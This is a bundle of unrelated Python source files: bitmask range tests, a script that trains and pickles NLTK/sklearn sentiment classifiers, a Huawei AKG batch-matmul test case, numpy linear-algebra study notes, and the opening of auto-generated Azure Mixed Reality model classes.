logger.debug(f'test_get_bitmask({lower}, {upper}, {allow}, {expected})')
bitmask = get_bitmask(lower, upper, allow, 'tst', bounds=test_boundaries)
assert bitmask == expected
@pytest.mark.parametrize(
"energy,bitmask,expected",
[(-1, allow_all, False), (100, allow_all, False), (16, allow_all, True),
(0, allow_none, False), (15, allow_none, False), (30, allow_none, False),
(0, bm1, True), (16, bm1, False), (30, bm1, True), (40, bm1, False),
(0, bm2, False), (16, bm2, True), (30, bm2, False), (-1, bm2, False),
(7, bm3, False), (16, bm3, False), (16.5, bm3, True), (17, bm3, False),
(15, bm4, True), (16, bm4, False), (16.5, bm4, False), (17, bm4, False)])
def test_check_bitmask(energy, bitmask, expected):
logger.debug(f'test_check_bitmask({energy}, {bitmask}, {expected}')
ok = check_bitmask(energy, bitmask, 'tst', bounds=test_boundaries)
assert ok == expected
@pytest.mark.parametrize(
"lower,upper,allow,expected",
[(0, 100, True, (0, 32)),
(10, 20, True, (10, 20)),
(10.5, 20.5, True, (11, 20)),
(11, 21, False, (11, 21)),
(9.5, 15.5, False, (9, 16)),
(10.4, 10.6, True, (10.4, 10.4))])
def test_actual_range(lower, upper, allow, expected):
logger.debug(f'test_actual_range({lower}, {upper}, {allow}, {expected})')
span = check_actual_range(lower, upper, allow, 'tst',
bounds=test_boundaries)
assert span == expected
@pytest.mark.parametrize(
"test_input",
[allow_none, allow_all, bm1, bm2, bm3, bm4])
def test_describe_bitmask(test_input):
logger.debug(f'test_describe_bitmask({test_input})')
describe_bitmask(test_input, 'tst', bounds=test_boundaries)
|
<filename>sentiment/scripts/pickle_classifiers.py
"""Contains functionalities to train and pickle classifiers for sentiment classification
using default training data."""
import os
import pickle
from nltk import SklearnClassifier, NaiveBayesClassifier
from nltk import classify
from sklearn.linear_model import LogisticRegression
from sklearn.naive_bayes import MultinomialNB, BernoulliNB
from sklearn.svm import LinearSVC
from sentiment import utils
from sentiment.services.preprocess import split_train_test_dataset
from sentiment.services.features import get_feature_sets
def train_naive_bayes_clf(training_set, testing_set):
"""
accuracy: 74.26
"""
naive_bayes_classifier = NaiveBayesClassifier.train(training_set)
print('Naive Bayes model accuracy:',
(classify.accuracy(naive_bayes_classifier, testing_set)) * 100)
naive_bayes_classifier.show_most_informative_features(15)
pickle_as = os.path.join(utils.get_project_root(),
'data/classifiers/naive_bayes_5k.pickle')
with open(pickle_as, 'wb') as f:
pickle.dump(naive_bayes_classifier, f)
def train_mnb_clf(training_set, testing_set):
"""
accuracy: 73.28
"""
mnb_classifier = SklearnClassifier(MultinomialNB())
mnb_classifier.train(training_set)
print("Multinomial NB Classifier accuracy:",
(classify.accuracy(mnb_classifier, testing_set)) * 100)
pickle_as = os.path.join(utils.get_project_root(),
'data/classifiers/mnb_classifier_5k.pickle')
with open(pickle_as, 'wb') as f:
pickle.dump(mnb_classifier, f)
def train_bernoulli_nb_clf(training_set, testing_set):
"""
accuracy: 74.64
"""
bernoulli_nb_classifier = SklearnClassifier(BernoulliNB())
bernoulli_nb_classifier.train(training_set)
print("Bernoulli NB Classifier accuracy:",
(classify.accuracy(bernoulli_nb_classifier, testing_set)) * 100)
pickle_as = os.path.join(utils.get_project_root(),
'data/classifiers/bernoulli_nb_classifier_5k.pickle')
with open(pickle_as, 'wb') as f:
pickle.dump(bernoulli_nb_classifier, f)
def train_logistic_regression_clf(training_set, testing_set):
"""
accuracy: 74.59
"""
logistic_regression_classifier = SklearnClassifier(LogisticRegression())
logistic_regression_classifier.train(training_set)
print('Logistic Regression Classifier accuracy:',
(classify.accuracy(logistic_regression_classifier, testing_set)) * 100)
pickle_as = os.path.join(utils.get_project_root(),
'data/classifiers/logistic_regression_classifier_5k.pickle')
with open(pickle_as, 'wb') as f:
pickle.dump(logistic_regression_classifier, f)
def train_linear_svc_clf(training_set, testing_set):
"""
accuracy: 72.01
"""
linear_svc_classifier = SklearnClassifier(LinearSVC())
linear_svc_classifier.train(training_set)
print("LinearSVC Classifier accuracy:",
(classify.accuracy(linear_svc_classifier, testing_set)) * 100)
pickle_as = os.path.join(utils.get_project_root(),
'data/classifiers/linear_svc_classifier_5k.pickle')
with open(pickle_as, 'wb') as f:
pickle.dump(linear_svc_classifier, f)
if __name__ == "__main__":
feature_sets = get_feature_sets()
training_set, testing_set = split_train_test_dataset(feature_sets)
# relatively quick to train
train_naive_bayes_clf(training_set, testing_set)
train_mnb_clf(training_set, testing_set)
train_linear_svc_clf(training_set, testing_set)
train_bernoulli_nb_clf(training_set, testing_set)
train_logistic_regression_clf(training_set, testing_set)
|
# Copyright 2019 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
batch_norm
"""
import os
import pytest
from tests.common.base import TestBase
class TestCase(TestBase):
def setup(self):
case_name = "test_akg_batchmatmul_run_001"
case_path = os.getcwd()
self.params_init(case_name, case_path)
self.caseresult = True
self._log.info("============= {0} Setup case============".format(self.casename))
self.testarg = [
# caseflag, opfuncname, testRunArgs, dimArgs
# bs, m, n, k, bias_shape, dtype, kernel_name, attrs
("batch_matmul_001", "batchmatmul_run",
((4,), 16, 48, 32, (1,), "float32", False, True, "batch_matmul_output")),
#("batch_matmul_002", "batchmatmul_run",
# ((4,), 16, 48, 32, (48,), "float32", False, True, "batch_matmul_output")),
("batch_matmul_003", "batchmatmul_run",
((4,), 16, 48, 32, (4, 16, 48), "float32", False, True, "batch_matmul_output")),
("batch_matmul_004", "batchmatmul_run", ((), 16, 48, 32, (), "float32", True, False, "batch_matmul_output")),
("batch_matmul_005", "batchmatmul_run", ((), 16, 48, 32, (), "float32", False, True, "batch_matmul_output")),
("batch_matmul_006", "batchmatmul_run",
((4, 2), 16, 48, 32, (1, 1), "float32", False, False, "batch_matmul_output")),
#("batch_matmul_007", "batchmatmul_run",
# ((4, 2), 16, 48, 32, (1, 48), "float32", False, False, "batch_matmul_output")),
("batch_matmul_008", "batchmatmul_run",
((4, 2), 16, 48, 32, (4, 2, 16, 48), "float32", False, False, "batch_matmul_output")),
("batch_matmul_009", "batchmatmul_run",
((4, 2), 16, 48, 32, (), "float32", True, False, "batch_matmul_output")),
("batch_matmul_010", "batchmatmul_run",
((8, 16), 128, 128, 64, (), "float32", False, True, "batch_matmul_output")),
############################
# for bert small case add by mini in ci
############################
# ("matmul_0033", "batchmatmul_run", ((), 3072, 768, 8192, (), "float16", True, False, "batch_matmul_bert")),
# ("matmul_0037", "batchmatmul_run", ((), 33, 64, 16384, (), "float32", True, False, "batch_matmul_bert")),
("matmul_0053", "batchmatmul_run", ((), 32000, 768, 20, (), "float32", True, False, "batch_matmul_bert")),
('matmul_0060', "batchmatmul_run", ((), 20, 768, 32000, (), 'float32', False, False, 'batchmatmul_bert')),
('matmul_0061', "batchmatmul_run", ((128,), 768, 64, 128, (), 'float32', False, False, 'batchmatmul_bert')),
# ('matmul_0062', "batchmatmul_run", ((), 16384, 6384, 33, (), 'float32', True, False, 'batchmatmul_bert')),
('matmul_0063', "batchmatmul_run", ((), 32000, 768, 20, (), 'float32', False, False, 'batchmatmul_bert')),
]
self.testarg_cloud = [
# caseflag, opfuncname, testRunArgs, dimArgs
# bs, m, n, k, bias_shape, dtype, kernel_name, attrs
(
"batch_matmul_001", "batchmatmul_run", ((), 16, 48, 32, (1,), "float32", False, True, "batch_matmul_output")),
("batch_matmul_002", "batchmatmul_run",
((), 16, 48, 32, (48,), "float32", False, True, "batch_matmul_output")),
("batch_matmul_003", "batchmatmul_run",
((), 16, 48, 32, (1, 1), "float32", False, True, "batch_matmul_output")),
("batch_matmul_004", "batchmatmul_run",
((), 16, 48, 32, (16, 1), "float32", False, True, "batch_matmul_output")),
("batch_matmul_005", "batchmatmul_run",
((), 16, 48, 32, (1, 48), "float32", False, True, "batch_matmul_output")),
("batch_matmul_006", "batchmatmul_run",
((), 16, 48, 32, (16, 48), "float32", False, True, "batch_matmul_output")),
# ("batch_matmul_007", "batchmatmul_run", ((64, 12), 128, 128, 64, (), "float32", False, False, "batch_matmul_output")),
("batch_matmul_001", "batchmatmul_run",
((1,), 128, 128, 1, (), "float32", False, False, "batch_matmul_output")),
]
self.testarg_rpc_cloud = [
# caseflag, opfuncname, testRunArgs, dimArgs
# bs, m, n, k, bias_shape, dtype, kernel_name, attrs
# 4D
# ("batch_matmul_4D_001", "batchmatmul_run", ((128,), 128, 64, 768, (), "float32", True, False, "batch_matmul_output")),
# ("batch_matmul_4D_002", "batchmatmul_run", ((64, 12), 128, 64, 128, (), "float32", False, False, "batch_matmul_output")),
# ("batch_matmul_4D_003", "batchmatmul_run", ((128,), 768, 128, 64, (), "float32", False, True, "batch_matmul_output")),
# ("batch_matmul_4D_004", "batchmatmul_run", ((64, 12), 128, 128, 64, (), "float32", False, True, "batch_matmul_output")),
# ("batch_matmul_4D_005", "batchmatmul_run", ((128,), 768, 64, 128, (), "float32", False, False, "batch_matmul_output")),
# caseflag, opfuncname, testRunArgs, dimArgs
# bs, m, n, k, bias_shape, dtype, kernel_name, attrs
("batch_matmul_007", "batchmatmul_run",
((64, 12), 128, 128, 64, (), "float32", False, False, "batch_matmul_output")),
("batch_matmul_007", "batchmatmul_run",
((1, 12), 128, 128, 64, (), "float32", False, False, "batch_matmul_output")),
("batch_matmul_001", "batchmatmul_run",
((1, 12), 128, 64, 128, (), "float32", False, False, "batch_matmul_output")),
# Matrix (2D)
("batch_matmul_2D_001", "batchmatmul_run",
((), 8192, 3072, 768, (), "float32", False, False, "batch_matmul_output")),
("batch_matmul_2D_007", "batchmatmul_run",
((), 64, 2, 768, (), "float32", False, True, "batch_matmul_output")),
("batch_matmul_2D_008", "batchmatmul_run",
((), 8192, 768, 21128, (), "float32", False, False, "batch_matmul_output"),
((16, 16), (16, 16), (16, 16))),
("batch_matmul_2D_009", "batchmatmul_run",
((), 8192, 768, 3072, (), "float32", False, True, "batch_matmul_output")),
("batch_matmul_2D_012", "batchmatmul_run",
((), 64, 768, 2, (), "float32", False, False, "batch_matmul_output")),
("batch_matmul_2D_013", "batchmatmul_run",
((), 8192, 768, 2, (), "float32", False, False, "batch_matmul_output")),
("batch_matmul_2D_014", "batchmatmul_run",
((), 8192, 768, 768, (), "float32", False, False, "batch_matmul_output")),
("batch_matmul_2D_015", "batchmatmul_run",
((), 64, 768, 768, (), "float32", False, False, "batch_matmul_output")),
("batch_matmul_2D_016", "batchmatmul_run",
((), 21128, 768, 8192, (), "float32", False, True, "batch_matmul_output")),
("batch_matmul_2D_017", "batchmatmul_run",
((), 768, 768, 1280, (), "float32", True, False, "batch_matmul_output")),
# # float - float:[64, 16, 128, 64] - [64, 16, 128, 64] = float:[64, 16, 128, 128]
("batch_matmul_4D_001", "batchmatmul_run",
((64, 16), 128, 128, 64, (), "float32", False, True, "batch_matmul_output")),
# float - float:[8, 16, 128, 64] - [8, 16, 128, 64] = float:[8, 16, 128, 128]
("batch_matmul_4D_002", "batchmatmul_run",
((8, 16), 128, 128, 64, (), "float32", False, True, "batch_matmul_output")),
# float - float:[64, 16, 128, 128] - [64, 16, 128, 64] = float:[64, 16, 128, 64]
("batch_matmul_4D_003", "batchmatmul_run",
((64, 16), 128, 64, 128, (), "float32", False, False, "batch_matmul_output")),
# float - float:[8, 16, 128, 128] - [8, 16, 128, 64] = float:[8, 16, 128, 64]
("batch_matmul_4D_004", "batchmatmul_run",
((8, 16), 128, 64, 128, (), "float32", False, False, "batch_matmul_output")),
# half - half:[128, 768, 128] - [128, 768, 64] = half:[128, 128, 64]
("batch_matmul_3D_005", "batchmatmul_run",
((128,), 128, 64, 768, (), "float16", True, False, "batch_matmul_output")),
# half - half:[64, 12, 128, 128] - [64, 12, 128, 64] = half:[64, 12, 128, 64]
("batch_matmul_4D_006", "batchmatmul_run",
((64, 12), 128, 64, 128, (), "float16", False, False, "batch_matmul_output")),
# # half - half:[128, 768, 64] - [128, 128, 64] = half:[128, 768, 128]
("batch_matmul_3D_007", "batchmatmul_run",
((128,), 768, 128, 64, (), "float16", False, True, "batch_matmul_output")),
# # half - half:[64, 12, 128, 64] - [64, 12, 128, 64] = half:[64, 12, 128, 128]
("batch_matmul_4D_008", "batchmatmul_run",
((64, 12), 128, 128, 64, (), "float16", False, True, "batch_matmul_output")),
# # half - half:[128, 768, 128] - [128, 128, 64] = half:[128, 768, 64]
("batch_matmul_3D_009", "batchmatmul_run",
((128,), 768, 64, 128, (), "float16", False, False, "batch_matmul_output")),
# cost a long time
# 3461 seconds for below this by run on 1980
# ("batch_matmul_2D_17", "batchmatmul_run", ((), 30522, 1024, 1280, False, "float32", True, False, "batch_matmul_output"), ((32, 32), (32, 32), (32, 32))),
# 3569 seconds for below this by run on 1980
# ("batch_matmul_2D_29", "batchmatmul_run", ((), 1280, 1024, 30522, False, "float32", False, False, "batch_matmul_output"), ((32, 32), (32, 32), (32, 32))),
# fail for now,
# As do not support that trans_a and trans_b both true:
# ("batch_matmul_2D_27", "batchmatmul_run", ((), 1024, 1024, 64, False, "float32", True, True, "batch_matmul_output")),
# half - half:[8192, 3072] - [768, 3072] = half:[8192, 768]
("matmul_0043", "batchmatmul_run",
((), 8192, 768, 3072, (), "float16", False, True, "batch_matmul_output_fp16")),
# half - half:[8192, 768] - [3072, 768] = half:[8192, 3072]
("matmul_0044", "batchmatmul_run",
((), 8192, 3072, 768, (), "float16", False, True, "batch_matmul_output_fp16")),
# half - half:[8192, 768] - [768, 768] = half:[8192, 768]
("matmul_0048", "batchmatmul_run",
((), 8192, 768, 768, (), "float16", False, False, "batch_matmul_output_fp16")),
# error: Not all Vars are passed in api_args: 'cc5' 'cc5' 'cc5' does not appear in api_args
# ("matmul_0029", "batchmatmul_run", ((), 768, 768, 8192, (), "float16", True, False, "batch_matmul_output"), ((1,1),(16,1),(1024,1))),
# ("matmul_0033", "batchmatmul_run", ((), 3072, 768, 8192, (), "float16", True, False, "batch_matmul_output"), ((1,1),(16,1),(1024,1))),
("matmul_0036", "batchmatmul_run",
((), 768, 3072, 768, (), "float16", False, False, "batch_matmul_output_fp16")),
# half - half:[8192, 768] - [768, 3072] = half:[8192, 3072]
("matmul_0035", "batchmatmul_run",
((), 8192, 3072, 768, (), "float16", False, False, "batch_matmul_output_fp16")),
# # half - half:[8192, 3072] - [3072, 768] = half:[8192, 768]
("matmul_0052", "batchmatmul_run",
((), 8192, 768, 3072, (), "float16", False, False, "batch_matmul_output_fp16")),
# lenet
('matmul_lenet_001_fp32', "batchmatmul_run", ((), 1, 120, 784, (120,), 'float32', False, True, 'batchmatmul_output')),
('matmul_lenet_002_fp32', "batchmatmul_run", ((), 1, 84, 120, (84,), 'float32', False, True, 'batchmatmul_output')),
('matmul_lenet_003_fp32', "batchmatmul_run", ((), 1, 10, 84, (10,), 'float32', False, True, 'batchmatmul_output')),
('matmul_lenet_004_fp32', "batchmatmul_run", ((), 10, 84, 1, (), 'float32', True, False, 'batchmatmul_output')),
('matmul_lenet_005_fp32', "batchmatmul_run", ((), 1, 84, 10, (), 'float32', False, False, 'batchmatmul_output')),
('matmul_lenet_006_fp32', "batchmatmul_run", ((), 84, 120, 1, (), 'float32', True, False, 'batchmatmul_output')),
('matmul_lenet_007_fp32', "batchmatmul_run", ((), 1, 120, 84, (), 'float32', False, False, 'batchmatmul_output')),
('matmul_lenet_008_fp16', "batchmatmul_run", ((), 120, 784, 1, (), 'float16', True, False, 'batchmatmul_output')),
('matmul_lenet_009_fp16', "batchmatmul_run", ((), 1, 784, 120, (), 'float32', False, False, 'batchmatmul_output')),
]
return
@pytest.mark.level0
@pytest.mark.platform_arm_ascend_training
@pytest.mark.platform_x86_ascend_training
@pytest.mark.env_onecard
def test_run(self):
"""
run case.#
:return:
"""
self.common_run(self.testarg)
def test_run_cloud(self):
"""
run case.#
:return:
"""
self.common_run(self.testarg_cloud)
def test_rpc_cloud(self):
"""
run case.#
:return:
"""
self.common_run([self.testarg_rpc_cloud[0]])
def teardown(self):
"""
clean environment
:return:
"""
self._log.info("============= {0} Teardown============".format(self.casename))
return
|
# linear algebra python
# https://www.google.com/search?q=linear+algebra+python&sxsrf=ALeKk00bAclhj18xCwEbKZ27J5UMzPRTfA%3A1621259417578&ei=mXSiYPXXItqNr7wPzoSXsAY&oq=linear+al&gs_lcp=Cgdnd3Mtd2l6EAMYATIECCMQJzIECAAQQzIECAAQQzIECC4QQzICCAAyBQgAEMsBMgUIABDLATICCAAyAggAMgIILjoHCCMQsAMQJzoHCAAQRxCwAzoHCAAQsAMQQzoFCAAQkQI6CggAELEDEIMBEEM6CwgAELEDEIMBEJECUOSkAVjptQFg5cABaAFwAngAgAHIAYgBiA2SAQUwLjkuMZgBAKABAaoBB2d3cy13aXrIAQrAAQE&sclient=gws-wiz
import numpy as np
from numpy import linalg as la
import time
'''
pinv, dot, matmul, multi_dot, arrays vs matrix vs vectors,
vdot, inner, outer, einsum/ einsum_path, matrix_power, kron,
decomposition, cond, det, solve, lstsq, inv
'''
# ---------- dot: product of two arrays -----------
m = np.arange(3) - 3
# print(m)
n = np.arange(3) - 2
# print(n)
# print(np.dot(m, n))
# print(np.dot(2, 3))
a = [[1, 0], [0, 1]]
b = [[4, 1], [2, 2]]
# print(np.dot(a, b))
a = np.arange(2*3*4).reshape((2, 3, -1))
# b = np.arange(3*4*5*6)[::-1].reshape((5, 4, 6, 3))
# print(a)
# print(b)
# ---------- multi_dot: product of two or more arrays -----------
A = np.random.random((5, 4))
B = np.random.random((4, 3))
C = np.random.random((3, 6))
D = np.random.random((6, 2))
# print(la.multi_dot([A, B, C, D]))
# ---------- vdot: product of two vectors -----------
# complex conjugate: a+bj vs a-bj
a = np.array([1+2j, 3+4j])
b = np.array([5+6j, 7+8j])
# print(np.vdot(a, b))
a = np.array([[1, 4], [5, 6], [5, 6]])
b = np.array([[4, 1], [2, 2], [5, 6]])
# print(np.vdot(a, b))
# ---------- inner: Inner product of two arrays -----------
# scalars: vô hướng
a = np.arange(3) - 1
b = np.arange(3) - 2
# print(np.inner(a, b))
a = np.arange(12).reshape((2, 3, -1))
# print(a)
b = np.arange(2)
# print(b)
# print(np.inner(a, b))
# b = 1 -> b scalar
# print(np.inner(np.eye(3), 1))
# ---------- outer : outer product of two arrays -----------
rl = np.outer(np.ones((5, )), np.linspace(-2, 2, 5))
# print(rl)
# print(np.ones((5, )))
# print(np.linspace(-2, 2, 5))
im = np.outer(1j*np.linspace(2, -2, 5), np.ones((5, )))
# print(im)
# grid for computing a Mandelbrot set
# print(rl + im)
# dtype
x = np.array(['a', 'b', 'c'], dtype=object)
# print(np.outer(x, [1, 2, 1]))
# ---------- matmul: matrix product of two arrays -----------
a = np.ones([9, 5, 7, 4])
c = np.ones([9, 5, 4, 3])
# print(a)
# print(c)
# # using shape to get dismensions
# print(np.dot(a, c).shape)
# print(np.matmul(a, c).shape)
a = np.array([[1, 0],
[0, 1]])
b = np.array([[4, 1],
[2, 2]])
# print(np.matmul(a, b))
a = np.arange(2 * 2 * 4).reshape((2, 2, 4))
b = np.arange(2 * 2 * 4).reshape((2, 4, 2))
# print(np.matmul(a, b).shape)
# print(np.matmul(a, b)[0, 1, 1])
# print(sum(a[0, 1, :]*b[0, :, 1]))
# print(np.matmul([2j, 3j], [2j, 3j]))
a = np.array([2j, 3j])
b = np.array([2j, 3j])
# print(a @ b)
# ---------- tensordot: tensor dot product along specified axes -----------
# axes = 0, 1, 2
# 2 tham số đầu tiên ảnh hưởng chính đến nhân ma trận
a = np.arange(6.).reshape(1, 2, -1)
b = np.arange(4.).reshape(2, 1, -1)
c = np.tensordot(a, b, axes=([1, 0], [0, 1]))
# c = np.tensordot(a, b, axes=([0, 1], [1, 0]))
# print(a)
# print()
# print(b)
# print()
# print(c.shape)
# d = np.zeros((3, 2))
# for i in range(3):
# for j in range(2):
# for k in range(1):
# for n in range(2):
# d[i, j] += a[k, n, i] * b[n, k, j]
# print(d)
a = np.array(range(1, 9))
a.shape = (2, 2, 2)
A = np.array(('a', 'b', 'c', 'd'), dtype=object)
A.shape = (2, 2)
# khi nào dùng axes nào = 0, 1, 2
res = np.tensordot(a, A, ((0, 1), (1, 0)))
# print(res.shape)
# ---------- einsum/ einsum_path: Einstein summation -----------
# https://numpy.org/doc/stable/reference/generated/numpy.einsum.html#numpy.einsum
a = np.arange(6.).reshape(1, 2, -1)
b = np.arange(4.).reshape(2, 1, -1)
# print(np.einsum('ijm,jik', a, b))
a = np.arange(25).reshape(5, 5)
b = np.arange(5)
c = np.arange(6).reshape(2, 3)
# print(np.einsum('ii', a))
# print(np.trace(a))
# print(np.einsum(a, [0, 0]))
# print(np.einsum('ii->i', a))
# print(np.diag(a))
# # Sum over an axis
# print(a)
# print(np.einsum('ij->i', a))
# print(np.sum(a, axis=1))
# print(np.sum(a, axis=0))
# print(np.einsum('...i->...', a))
# # matrix transpose
# print(np.einsum('ji', a))
# print(np.einsum('ij->ji', a))
# print(np.transpose(a))
# print(a.T)
# print(np.einsum(a, [1, 0]))
# # Vector inner products
# print(b)
# print(np.einsum('i,i', b, b))
# print(np.einsum(b, [0], b, [0]))
# print(np.dot(b, b.T))
# print(np.inner(b, b))
# # Matrix vector multiplication
# print(np.einsum('ij,j', a, b))
# print(np.einsum(a, [0, 1], b, [1])) # ???
# print(np.dot(a, b))
# print(np.einsum('...j,j', a, b)) # ???
# # scalar multiplication
# print(np.einsum(',ij', 3, c))
# print(np.multiply(3, c))
# # Writeable returned arrays
# a = np.zeros((3, 3))
# np.einsum('ii->i', a)[:] = 1
# print(a)
# # Chained array operations. For more complicated contractions
# a = np.ones(64).reshape(2, 4, 8)
# # print(a)
# t0 = time.time()
# path = np.einsum_path('ijk,ilm,njm,nlk,abc->', a, a,
# a, a, a, optimize='optimal')[0]
# for item in range(500):
# # _ = np.einsum('ijk,ilm,njm,nlk,abc->', a, a, a, a, a)
# # _ = np.einsum('ijk,ilm,njm,nlk,abc->', a, a, a, a, a, optimize='optimal')
# # _ = np.einsum('ijk,ilm,njm,nlk,abc->', a, a, a, a, a, optimize='greedy')
# _ = np.einsum('ijk,ilm,njm,nlk,abc->', a, a, a, a, a, optimize=path)
# t1 = time.time()
# print(t1-t0)
# # ---------------- bonus :
# a = np.arange(25).reshape(5, 5)
# # print(a)
# print(np.average(a, axis=0))
# print(np.average(a, axis=1))
# ---------- matrix_power: matrix to power -----------
i = np.array([[0, 1], [-1, 0]])
# i = np.ones((3, 3))
# print(i)
# print(la.matrix_power(i, 0))
# print(la.matrix_power(i, -3))
# q = np.zeros((4, 4))
# q[0:2, 0:2] = -i
# q[2:4, 2:4] = i
# print(la.matrix_power(q, 2))
# ---------- kron: Kronecker product of two arrays -----------
# https://math.stackexchange.com/questions/1874581/why-use-the-kronecker-product
a = np.arange(3)
b = np.arange(3) - 2
# print(a)
# print(b)
# print(np.kron(a.T, b.T))
# print(np.kron([1, 10, 100], [5, 6, 7]))
# print(np.kron([5, 6, 7], [1, 10, 100]))
# # ones, zeros, eye
# print(np.kron(np.eye(2), np.ones((2, 2))))
a = np.arange(100).reshape((2, 5, 2, 5))
b = np.arange(24).reshape((2, 3, 4))
c = np.kron(a, b)
# print(c.shape)
# ---------- cholesky: Cholesky decomposition -----------
# https://www.sciencedirect.com/topics/engineering/cholesky-decomposition
A = np.array([[1, -2j], [2j, 5]])
# print(A)
L = la.cholesky(A)
# print(L)
# print(np.dot(L, L.T.conj()))
# if array_like
A = [[1, -2j], [2j, 5]]
# print(type(la.cholesky(A)))
# print(type(la.cholesky(np.matrix(A))))
# ---------- qr: qr decomposition -----------
# https://math.stackexchange.com/questions/198479/why-is-qr-factorization-useful-and-important
# https://en.wikipedia.org/wiki/Least_squares
# https://en.wikipedia.org/wiki/Orthonormality
a = np.random.randn(3, 2)
q, r = la.qr(a)
# print(q, r)
# print(r)
# print(np.allclose(a, np.dot(q, r)))
# print(la.qr(a, mode='r'))
A = np.array([[0, 1], [1, 1], [1, 1], [2, 1]])
b = np.array([1, 0, 2, 1])
q, r = la.qr(A)
p = np.dot(q.T, b)
# print(np.dot(np.linalg.inv(r), p))
# print(la.lstsq(A, b, rcond=None)[0])
# ---------- svd: svd decomposition -----------
# https://stats.stackexchange.com/questions/19607/what-is-the-point-of-singular-value-decomposition
a = np.random.randn(9, 6) + 1j*np.random.randn(9, 6)
b = np.random.randn(2, 7, 8, 3) + 1j*np.random.randn(2, 7, 8, 3)
u, s, vh = np.linalg.svd(a, full_matrices=True)
# print(u, s, vh)
# print(u.shape, s.shape, vh.shape)
# print(np.allclose(a, np.dot(u[:, :6] * s, vh)))
smat = np.zeros((9, 6), dtype=complex)
smat[:6, :6] = np.diag(s)
# print(np.allclose(a, np.dot(u, np.dot(smat, vh))))
u, s, vh = np.linalg.svd(a, full_matrices=False)
# print(np.allclose(a, np.dot(u * s, vh)))
smat = np.diag(s)
# print(np.allclose(a, np.dot(u, np.dot(smat, vh))))
# ---------- eig: eigenvalues and right eigenvectors -----------
# print(np.diag((1, 2, 3)))
w, v = la.eig(np.diag((1, 2, 3)))
# # columns vector
# print(w)
# # diag matrix
# print(v)
w, v = la.eig(np.array([[1, -1], [1, 1]]))
# print(w)
# print(v)
# ---------- eigh: Hermitian eigenvalues and eigenvectors -----------
# ---------- eigvals: eigenvalues of a general matrix -----------
# ---------- eigvalsh: Hermitian eigenvalues of a general matrix ----
# ---------- norm: Matrix or vector norm 02_part -----------
# ---------- cond: condition number -----------
a = np.array([[1, 0, -1], [0, 1, 0], [1, 0, 1]])
# print(la.cond(a))
# print(la.cond(a, 'fro'))
# print(la.cond(a, np.inf))
# ---------- det: determinant -----------
a = np.array([[1, 2], [3, 4]])
# a = np.array([[[1, 2], [3, 4]], [[1, 2], [2, 1]], [[1, 3], [3, 1]]])
# print(la.det(a))
# ---------- matrix_rank: matrix rank of array -----------
# ---------- slogdet: sign and logarithm determinant -----------
(sign, logdet) = la.slogdet(a)
# print(sign)
# print(logdet)
# print(sign*np.exp(logdet)) # = det
# ---------- trace: sum along diagonals -----------
# print(np.trace(a))
# ---------- solve: Solve a linear matrix equation -----------
a = np.array([[1, 2], [3, 5]])
b = np.array([1, 2])
x = la.solve(a, b)
# print(x)
# print(np.allclose(np.dot(a, x), b))
# ---------- tensorsolve: Solve the tensor equation -----------
a = np.eye(2*3*4)
a.shape = (2*3, 4, 2, 3, 4)
b = np.random.randn(2*3, 4)
x = la.tensorsolve(a, b)
# print(x.shape)
# print(np.allclose(np.tensordot(a, x, axes=3), b))
# ---------- lstsq: least-squares solution -----------
x = np.array([0, 1, 2, 3])
y = np.array([-1, 0.2, 0.9, 2.1])
A = np.vstack([x, np.ones(len(x))]).T
m, c = la.lstsq(A, y, rcond=None)[0]
# print(m, c)
# ---------- inv: inverse of a matrix -----------
a = np.array([[1., 2.], [3., 4.]])
# print(type(a))
ainv = la.inv(a)
# print(ainv)
# print(np.allclose(np.dot(a, ainv), np.eye(2)))
# print(la.inv(np.matrix(a)))
a = np.array([[[1., 2.], [3., 4.]], [[1, 3], [3, 5]]])
# print(la.inv(a))
# ---------- pinv: pseudo inverse of a matrix -----------
a = np.random.randn(3, 2)
B = la.pinv(a)
# print(np.allclose(a, np.dot(a, np.dot(B, a))))
# print(np.allclose(B, np.dot(B, np.dot(a, B))))
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import Dict, List, Optional, Union
from azure.core.exceptions import HttpResponseError
import msrest.serialization
from ._mixed_reality_client_enums import *
class AccountKeyRegenerateRequest(msrest.serialization.Model):
"""Request for account key regeneration.
:param serial: serial of key to be regenerated. Possible values include: 1, 2. Default value:
"1".
:type serial: str or ~mixed_reality_client.models.Serial
"""
_attribute_map = {
'serial': {'key': 'serial', 'type': 'int'},
}
def __init__(
self,
*,
serial: Optional[Union[int, "Serial"]] = "1",
**kwargs
):
super(AccountKeyRegenerateRequest, self).__init__(**kwargs)
self.serial = serial
class AccountKeys(msrest.serialization.Model):
"""Developer Keys of account.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar primary_key: value of primary key.
:vartype primary_key: str
:ivar secondary_key: value of secondary key.
:vartype secondary_key: str
"""
_validation = {
'primary_key': {'readonly': True},
'secondary_key': {'readonly': True},
}
_attribute_map = {
'primary_key': {'key': 'primaryKey', 'type': 'str'},
'secondary_key': {'key': 'secondaryKey', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(AccountKeys, self).__init__(**kwargs)
self.primary_key = None
self.secondary_key = None
class CheckNameAvailabilityRequest(msrest.serialization.Model):
"""Check Name Availability Request.
All required parameters must be populated in order to send to Azure.
:param name: Required. Resource Name To Verify.
:type name: str
:param type: Required. Fully qualified resource type which includes provider namespace.
:type type: str
"""
_validation = {
'name': {'required': True},
'type': {'required': True},
}
_attribute_map = {
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
}
def __init__(
self,
*,
name: str,
type: str,
**kwargs
):
super(CheckNameAvailabilityRequest, self).__init__(**kwargs)
self.name = name
self.type = type
class CheckNameAvailabilityResponse(msrest.serialization.Model):
"""Check Name Availability Response.
All required parameters must be populated in order to send to Azure.
:param name_available: Required. if name Available. Possible values include: "true", "false".
:type name_available: str or ~mixed_reality_client.models.NameAvailability
